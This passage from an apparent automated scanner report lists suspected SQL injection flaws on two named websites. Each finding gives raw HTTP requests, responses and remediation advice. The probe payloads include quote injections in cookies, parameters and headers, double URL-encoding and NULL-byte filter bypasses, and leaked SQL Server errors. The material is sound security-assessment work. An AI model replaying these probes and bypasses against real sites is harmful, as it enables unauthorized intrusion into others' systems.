Path:   /

Issue detail

The exp_last_visit cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the exp_last_visit cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the exp_last_visit cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

POST / HTTP/1.1
Host: theplatform.com
Proxy-Connection: keep-alive
Content-Length: 302
Cache-Control: max-age=0
Origin: http://theplatform.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://theplatform.com/corp/support/trc_sign_in/?target=%2Fhomepage.action
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=267669451.1746413117.1317840279.1317840279.1317840279.1; __utmc=267669451; __utmz=267669451.1317840279.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); exp_last_visit=1002505444%2527; ReleasePID=9CpuQ5DYNOrS3IiA5kMEidXtOK4mfjBe; ReleaseDeliveryTime=1317840245889; exp_last_activity=1317865450; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fcorp%2Fsupport%2Ftrc_sign_in%2F%22%3Bi%3A1%3Bs%3A34%3A%22%2Fproducts%2Fproduct_detail%2Ftype%2Fmpx%2F%22%3B%7D; __utmb=267669451

ACT=19&XID=f4fb5e166e24cf647a00fb05a40e1eb477aeca3c&RP=search%2Fresults&NRP=search%26%2347%3Bnoresults&RES=&status=Featured%7COpen&weblog=Blog%7Cnews_and_events%7Cstatic_pages%7CProducts%7CSolutions%7
...[SNIP]...

Response 1

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 18:46:29 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.12
Set-Cookie: exp_last_activity=1317865589; expires=Thu, 04-Oct-2012 18:46:29 GMT; path=/
Content-Length: 1641
Connection: close
Content-Type: text/html

<html>
<head>

<title>Error</title>

<meta http-equiv='content-type' content='text/html; charset=utf-8' />


<style type="text/css">

body {
background-color:    #ffffff;
margin:                50px;
font-family
...[SNIP]...

Request 2

POST / HTTP/1.1
Host: theplatform.com
Proxy-Connection: keep-alive
Content-Length: 302
Cache-Control: max-age=0
Origin: http://theplatform.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://theplatform.com/corp/support/trc_sign_in/?target=%2Fhomepage.action
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=267669451.1746413117.1317840279.1317840279.1317840279.1; __utmc=267669451; __utmz=267669451.1317840279.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); exp_last_visit=1002505444%2527%2527; ReleasePID=9CpuQ5DYNOrS3IiA5kMEidXtOK4mfjBe; ReleaseDeliveryTime=1317840245889; exp_last_activity=1317865450; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fcorp%2Fsupport%2Ftrc_sign_in%2F%22%3Bi%3A1%3Bs%3A34%3A%22%2Fproducts%2Fproduct_detail%2Ftype%2Fmpx%2F%22%3B%7D; __utmb=267669451

ACT=19&XID=f4fb5e166e24cf647a00fb05a40e1eb477aeca3c&RP=search%2Fresults&NRP=search%26%2347%3Bnoresults&RES=&status=Featured%7COpen&weblog=Blog%7Cnews_and_events%7Cstatic_pages%7CProducts%7CSolutions%7
...[SNIP]...

Response 2

HTTP/1.1 302 Found
Date: Wed, 05 Oct 2011 18:46:30 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.12
Set-Cookie: exp_last_activity=1317865590; expires=Thu, 04-Oct-2012 18:46:30 GMT; path=/
Location: http://theplatform.com/search/noresults/bc9e290325e7d168813766272e53c250/
Content-Length: 0
Connection: close
Content-Type: text/html


1.12. http://theplatform.com/ [exp_tracker cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://theplatform.com
Path:   /

Issue detail

The exp_tracker cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the exp_tracker cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

POST / HTTP/1.1
Host: theplatform.com
Proxy-Connection: keep-alive
Content-Length: 302
Cache-Control: max-age=0
Origin: http://theplatform.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://theplatform.com/corp/support/trc_sign_in/?target=%2Fhomepage.action
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=267669451.1746413117.1317840279.1317840279.1317840279.1; __utmc=267669451; __utmz=267669451.1317840279.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); exp_last_visit=1002505444; ReleasePID=9CpuQ5DYNOrS3IiA5kMEidXtOK4mfjBe; ReleaseDeliveryTime=1317840245889; exp_last_activity=1317865450; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fcorp%2Fsupport%2Ftrc_sign_in%2F%22%3Bi%3A1%3Bs%3A34%3A%22%2Fproducts%2Fproduct_detail%2Ftype%2Fmpx%2F%22%3B%7D%00'; __utmb=267669451

ACT=19&XID=f4fb5e166e24cf647a00fb05a40e1eb477aeca3c&RP=search%2Fresults&NRP=search%26%2347%3Bnoresults&RES=&status=Featured%7COpen&weblog=Blog%7Cnews_and_events%7Cstatic_pages%7CProducts%7CSolutions%7
...[SNIP]...

Response 1

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 18:46:43 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.12
Set-Cookie: exp_last_activity=1317865603; expires=Thu, 04-Oct-2012 18:46:43 GMT; path=/
Content-Length: 1641
Connection: close
Content-Type: text/html

<html>
<head>

<title>Error</title>

<meta http-equiv='content-type' content='text/html; charset=utf-8' />


<style type="text/css">

body {
background-color:    #ffffff;
margin:                50px;
font-family
...[SNIP]...

Request 2

POST / HTTP/1.1
Host: theplatform.com
Proxy-Connection: keep-alive
Content-Length: 302
Cache-Control: max-age=0
Origin: http://theplatform.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://theplatform.com/corp/support/trc_sign_in/?target=%2Fhomepage.action
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=267669451.1746413117.1317840279.1317840279.1317840279.1; __utmc=267669451; __utmz=267669451.1317840279.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); exp_last_visit=1002505444; ReleasePID=9CpuQ5DYNOrS3IiA5kMEidXtOK4mfjBe; ReleaseDeliveryTime=1317840245889; exp_last_activity=1317865450; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fcorp%2Fsupport%2Ftrc_sign_in%2F%22%3Bi%3A1%3Bs%3A34%3A%22%2Fproducts%2Fproduct_detail%2Ftype%2Fmpx%2F%22%3B%7D%00''; __utmb=267669451

ACT=19&XID=f4fb5e166e24cf647a00fb05a40e1eb477aeca3c&RP=search%2Fresults&NRP=search%26%2347%3Bnoresults&RES=&status=Featured%7COpen&weblog=Blog%7Cnews_and_events%7Cstatic_pages%7CProducts%7CSolutions%7
...[SNIP]...

Response 2

HTTP/1.1 302 Found
Date: Wed, 05 Oct 2011 18:46:43 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.12
Set-Cookie: exp_last_activity=1317865603; expires=Thu, 04-Oct-2012 18:46:44 GMT; path=/
Location: http://theplatform.com/search/noresults/dd66db1dd175a14bc16f418967b23d8c/
Content-Length: 0
Connection: close
Content-Type: text/html


1.13. http://theplatform.com/ [keywords parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://theplatform.com
Path:   /

Issue detail

The keywords parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the keywords parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

POST / HTTP/1.1
Host: theplatform.com
Proxy-Connection: keep-alive
Content-Length: 302
Cache-Control: max-age=0
Origin: http://theplatform.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://theplatform.com/corp/support/trc_sign_in/?target=%2Fhomepage.action
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=267669451.1746413117.1317840279.1317840279.1317840279.1; __utmc=267669451; __utmz=267669451.1317840279.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); exp_last_visit=1002505444; ReleasePID=9CpuQ5DYNOrS3IiA5kMEidXtOK4mfjBe; ReleaseDeliveryTime=1317840245889; exp_last_activity=1317865450; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fcorp%2Fsupport%2Ftrc_sign_in%2F%22%3Bi%3A1%3Bs%3A34%3A%22%2Fproducts%2Fproduct_detail%2Ftype%2Fmpx%2F%22%3B%7D; __utmb=267669451

ACT=19&XID=f4fb5e166e24cf647a00fb05a40e1eb477aeca3c&RP=search%2Fresults&NRP=search%26%2347%3Bnoresults&RES=&status=Featured%7COpen&weblog=Blog%7Cnews_and_events%7Cstatic_pages%7CProducts%7CSolutions%7CCareers%7Cwhite_papers&search_in=&where=all&site_id=1&keywords=xss+bond+interest+roi%00'&searchBtn=Search

Response 1

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 18:46:08 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.12
Set-Cookie: exp_last_activity=1317865568; expires=Thu, 04-Oct-2012 18:46:08 GMT; path=/
Content-Length: 1641
Connection: close
Content-Type: text/html

<html>
<head>

<title>Error</title>

<meta http-equiv='content-type' content='text/html; charset=utf-8' />


<style type="text/css">

body {
background-color:    #ffffff;
margin:                50px;
font-family
...[SNIP]...

Request 2

POST / HTTP/1.1
Host: theplatform.com
Proxy-Connection: keep-alive
Content-Length: 302
Cache-Control: max-age=0
Origin: http://theplatform.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://theplatform.com/corp/support/trc_sign_in/?target=%2Fhomepage.action
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=267669451.1746413117.1317840279.1317840279.1317840279.1; __utmc=267669451; __utmz=267669451.1317840279.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); exp_last_visit=1002505444; ReleasePID=9CpuQ5DYNOrS3IiA5kMEidXtOK4mfjBe; ReleaseDeliveryTime=1317840245889; exp_last_activity=1317865450; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fcorp%2Fsupport%2Ftrc_sign_in%2F%22%3Bi%3A1%3Bs%3A34%3A%22%2Fproducts%2Fproduct_detail%2Ftype%2Fmpx%2F%22%3B%7D; __utmb=267669451

ACT=19&XID=f4fb5e166e24cf647a00fb05a40e1eb477aeca3c&RP=search%2Fresults&NRP=search%26%2347%3Bnoresults&RES=&status=Featured%7COpen&weblog=Blog%7Cnews_and_events%7Cstatic_pages%7CProducts%7CSolutions%7CCareers%7Cwhite_papers&search_in=&where=all&site_id=1&keywords=xss+bond+interest+roi%00''&searchBtn=Search

Response 2

HTTP/1.1 302 Found
Date: Wed, 05 Oct 2011 18:46:09 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.12
Set-Cookie: exp_last_activity=1317865569; expires=Thu, 04-Oct-2012 18:46:09 GMT; path=/
Location: http://theplatform.com/search/noresults/2eaa57dfc66eb1dfcc53b777ec4443ba/
Content-Length: 0
Connection: close
Content-Type: text/html


1.14. http://theplatform.com/ [site_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://theplatform.com
Path:   /

Issue detail

The site_id parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the site_id parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

POST / HTTP/1.1
Host: theplatform.com
Proxy-Connection: keep-alive
Content-Length: 302
Cache-Control: max-age=0
Origin: http://theplatform.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://theplatform.com/corp/support/trc_sign_in/?target=%2Fhomepage.action
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=267669451.1746413117.1317840279.1317840279.1317840279.1; __utmc=267669451; __utmz=267669451.1317840279.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); exp_last_visit=1002505444; ReleasePID=9CpuQ5DYNOrS3IiA5kMEidXtOK4mfjBe; ReleaseDeliveryTime=1317840245889; exp_last_activity=1317865450; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fcorp%2Fsupport%2Ftrc_sign_in%2F%22%3Bi%3A1%3Bs%3A34%3A%22%2Fproducts%2Fproduct_detail%2Ftype%2Fmpx%2F%22%3B%7D; __utmb=267669451

ACT=19&XID=f4fb5e166e24cf647a00fb05a40e1eb477aeca3c&RP=search%2Fresults&NRP=search%26%2347%3Bnoresults&RES=&status=Featured%7COpen&weblog=Blog%7Cnews_and_events%7Cstatic_pages%7CProducts%7CSolutions%7CCareers%7Cwhite_papers&search_in=&where=all&site_id=1%00'&keywords=xss+bond+interest+roi&searchBtn=Search

Response 1

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 18:46:03 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.12
Set-Cookie: exp_last_activity=1317865563; expires=Thu, 04-Oct-2012 18:46:03 GMT; path=/
Content-Length: 1641
Connection: close
Content-Type: text/html

<html>
<head>

<title>Error</title>

<meta http-equiv='content-type' content='text/html; charset=utf-8' />


<style type="text/css">

body {
background-color:    #ffffff;
margin:                50px;
font-family
...[SNIP]...

Request 2

POST / HTTP/1.1
Host: theplatform.com
Proxy-Connection: keep-alive
Content-Length: 302
Cache-Control: max-age=0
Origin: http://theplatform.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://theplatform.com/corp/support/trc_sign_in/?target=%2Fhomepage.action
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=267669451.1746413117.1317840279.1317840279.1317840279.1; __utmc=267669451; __utmz=267669451.1317840279.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); exp_last_visit=1002505444; ReleasePID=9CpuQ5DYNOrS3IiA5kMEidXtOK4mfjBe; ReleaseDeliveryTime=1317840245889; exp_last_activity=1317865450; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fcorp%2Fsupport%2Ftrc_sign_in%2F%22%3Bi%3A1%3Bs%3A34%3A%22%2Fproducts%2Fproduct_detail%2Ftype%2Fmpx%2F%22%3B%7D; __utmb=267669451

ACT=19&XID=f4fb5e166e24cf647a00fb05a40e1eb477aeca3c&RP=search%2Fresults&NRP=search%26%2347%3Bnoresults&RES=&status=Featured%7COpen&weblog=Blog%7Cnews_and_events%7Cstatic_pages%7CProducts%7CSolutions%7CCareers%7Cwhite_papers&search_in=&where=all&site_id=1%00''&keywords=xss+bond+interest+roi&searchBtn=Search

Response 2

HTTP/1.1 302 Found
Date: Wed, 05 Oct 2011 18:46:04 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.12
Set-Cookie: exp_last_activity=1317865564; expires=Thu, 04-Oct-2012 18:46:04 GMT; path=/
Location: http://theplatform.com/search/noresults/7e4dd92e8c4e835028c07fea2c209122/
Content-Length: 0
Connection: close
Content-Type: text/html


1.15. http://theplatform.com/ [where parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://theplatform.com
Path:   /

Issue detail

The where parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the where parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the where request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

POST / HTTP/1.1
Host: theplatform.com
Proxy-Connection: keep-alive
Content-Length: 302
Cache-Control: max-age=0
Origin: http://theplatform.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://theplatform.com/corp/support/trc_sign_in/?target=%2Fhomepage.action
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=267669451.1746413117.1317840279.1317840279.1317840279.1; __utmc=267669451; __utmz=267669451.1317840279.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); exp_last_visit=1002505444; ReleasePID=9CpuQ5DYNOrS3IiA5kMEidXtOK4mfjBe; ReleaseDeliveryTime=1317840245889; exp_last_activity=1317865450; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fcorp%2Fsupport%2Ftrc_sign_in%2F%22%3Bi%3A1%3Bs%3A34%3A%22%2Fproducts%2Fproduct_detail%2Ftype%2Fmpx%2F%22%3B%7D; __utmb=267669451

ACT=19&XID=f4fb5e166e24cf647a00fb05a40e1eb477aeca3c&RP=search%2Fresults&NRP=search%26%2347%3Bnoresults&RES=&status=Featured%7COpen&weblog=Blog%7Cnews_and_events%7Cstatic_pages%7CProducts%7CSolutions%7CCareers%7Cwhite_papers&search_in=&where=all%2527&site_id=1&keywords=xss+bond+interest+roi&searchBtn=Search

Response 1

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 18:45:59 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.12
Set-Cookie: exp_last_activity=1317865559; expires=Thu, 04-Oct-2012 18:45:59 GMT; path=/
Content-Length: 1641
Connection: close
Content-Type: text/html

<html>
<head>

<title>Error</title>

<meta http-equiv='content-type' content='text/html; charset=utf-8' />


<style type="text/css">

body {
background-color:    #ffffff;
margin:                50px;
font-family
...[SNIP]...

Request 2

POST / HTTP/1.1
Host: theplatform.com
Proxy-Connection: keep-alive
Content-Length: 302
Cache-Control: max-age=0
Origin: http://theplatform.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://theplatform.com/corp/support/trc_sign_in/?target=%2Fhomepage.action
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=267669451.1746413117.1317840279.1317840279.1317840279.1; __utmc=267669451; __utmz=267669451.1317840279.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); exp_last_visit=1002505444; ReleasePID=9CpuQ5DYNOrS3IiA5kMEidXtOK4mfjBe; ReleaseDeliveryTime=1317840245889; exp_last_activity=1317865450; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fcorp%2Fsupport%2Ftrc_sign_in%2F%22%3Bi%3A1%3Bs%3A34%3A%22%2Fproducts%2Fproduct_detail%2Ftype%2Fmpx%2F%22%3B%7D; __utmb=267669451

ACT=19&XID=f4fb5e166e24cf647a00fb05a40e1eb477aeca3c&RP=search%2Fresults&NRP=search%26%2347%3Bnoresults&RES=&status=Featured%7COpen&weblog=Blog%7Cnews_and_events%7Cstatic_pages%7CProducts%7CSolutions%7CCareers%7Cwhite_papers&search_in=&where=all%2527%2527&site_id=1&keywords=xss+bond+interest+roi&searchBtn=Search

Response 2

HTTP/1.1 302 Found
Date: Wed, 05 Oct 2011 18:45:59 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.12
Set-Cookie: exp_last_activity=1317865560; expires=Thu, 04-Oct-2012 18:46:00 GMT; path=/
Location: http://theplatform.com/search/noresults/f4d861309cae582888a56d8366620105/
Content-Length: 0
Connection: close
Content-Type: text/html


1.16. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /Tracking/V2/BannerCreative/Impression/?siteId=1606&syndicationOutletId=66922&campaignId=6618&adRotationId=23337&bannerCreativeAdModuleId=31602&redirect=http%3a%2f%2fvindicoasset.edgesuite.net%2fRepository%2fCampaignCreative%2fCampaign_6618%2fBANNERCREATIVE%2fSuave_300x60.jpg HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.google.com/search?hl=en&q='
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=245a9d68-6452-49a8-98f4-7fb38d8d1b33; vpp=245a9d68-6452-49a8-98f4-7fb38d8d1b33

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Wed, 05 Oct 2011 18:40:33 GMT
Expires: Wed, 05 Oct 2011 18:40:33 GMT
Server: Microsoft-IIS/7.5
Vary: Accept-Encoding
X-VINDICO-Instance: i-6d47ec0c
Content-Length: 775
Connection: keep-alive

<br>Error Description:Incorrect syntax near the keyword 'Default'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 1606, @bannerCreativeAdModuleId = 31602, @campaignId = 6618, @syndicationOutlet
...[SNIP]...

Request 2

GET /Tracking/V2/BannerCreative/Impression/?siteId=1606&syndicationOutletId=66922&campaignId=6618&adRotationId=23337&bannerCreativeAdModuleId=31602&redirect=http%3a%2f%2fvindicoasset.edgesuite.net%2fRepository%2fCampaignCreative%2fCampaign_6618%2fBANNERCREATIVE%2fSuave_300x60.jpg HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.google.com/search?hl=en&q=''
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=245a9d68-6452-49a8-98f4-7fb38d8d1b33; vpp=245a9d68-6452-49a8-98f4-7fb38d8d1b33

Response 2

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Type: text/html
Date: Wed, 05 Oct 2011 18:40:33 GMT
Expires: Wed, 05 Oct 2011 18:40:34 GMT
Location: http://vindicoasset.edgesuite.net/Repository/CampaignCreative/Campaign_6618/BANNERCREATIVE/Suave_300x60.jpg
Server: Microsoft-IIS/7.5
X-VINDICO-Instance: i-8f70cee1
Content-Length: 228
Connection: keep-alive

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://vindicoasset.edgesuite.net/Repository/CampaignCreative/Campaign_6618/BANNERCREATIVE/Suave_3
...[SNIP]...

1.17. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /Tracking/V2/BannerCreative/Impression/?siteId=1606&syndicationOutletId=66922&campaignId=6618&adRotationId=23337&bannerCreativeAdModuleId=31602&redirect=http%3a%2f%2fvindicoasset.edgesuite.net%2fRepository%2fCampaignCreative%2fCampaign_6618%2fBANNERCREATIVE%2fSuave_300x60.jpg HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1'
Accept: */*
Referer: http://www.cbs.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=245a9d68-6452-49a8-98f4-7fb38d8d1b33; vpp=245a9d68-6452-49a8-98f4-7fb38d8d1b33

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Wed, 05 Oct 2011 18:40:31 GMT
Expires: Wed, 05 Oct 2011 18:40:31 GMT
Server: Microsoft-IIS/7.5
Vary: Accept-Encoding
X-VINDICO-Instance: i-b540ebd4
Content-Length: 706
Connection: keep-alive

<br>Error Description:Incorrect syntax near 'undefined'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 1606, @bannerCreativeAdModuleId = 31602, @campaignId = 6618, @syndicationOutletId = 66922
...[SNIP]...

Request 2

